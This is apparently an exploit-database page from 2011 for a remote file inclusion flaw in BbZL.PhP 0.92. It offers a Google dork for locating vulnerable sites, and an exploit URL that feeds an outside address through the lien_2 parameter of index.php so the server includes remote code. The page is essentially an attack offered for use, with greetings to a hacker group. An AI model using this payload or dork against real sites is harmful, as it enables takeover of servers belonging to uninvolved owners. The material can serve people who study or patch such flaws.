BbZL.PhP File Inclusion Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BbZL.PhP File Inclusion Exploit
# Published : 2011-07-06
# Author :
# Previous Title : DmxReady Contact Us Manager v1.2 SQL Injection Vulnerability
# Next Title : Portix-CMS 1.5.0. rc5 Local File Inclusion Vulnerability

 _________________________________________________________________________________________
|                           _              _                                              |
| ||\      || ||       || | \          // |  ____      ________           __________    |
| || \     || ||       || | |\        //| | |        |  ______|         |_______/ /    |
| ||  \    || ||       || | | \      // | | |  _     | |                       / /     |
| ||   \   || ||       || | |  \    //  | | | |_)  |  | |______    /`'__     / /      |
| ||    \  || ||       || | |   \  //   | | |  _  <   |  ______|     /     / /       |
| ||     \ || ||_______|| | |    \//    | | | |_)  |  | |______      _    / /        |
| ||      \|| |_________| |_|     /     |_| |_____/   |________|     /_/   /_/         |
|_________________________________________________________________________________________|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Exploit Title: [BbZL.PhP File Inclusion Exploit]
# Google Dork: [intitle:"BbZL.PhP 0.92 CSS2"]
# Date: [06/07/2011]
# Author: [Number 7]
# Software Link: [http://www.easy-script.com/scripts-dl/bbzl_PhP_092.zip]
# Version: [0.92 CSS2]
# Tested on: [linux/Windows NT]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exp: http://www.site.tn/path/index.php?type=3&lien_2=http://site.com.tn/



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
GreetZ:S-man // Wx // Alen // M@TaDoR // LastBreath1 // all Tunisian Hackers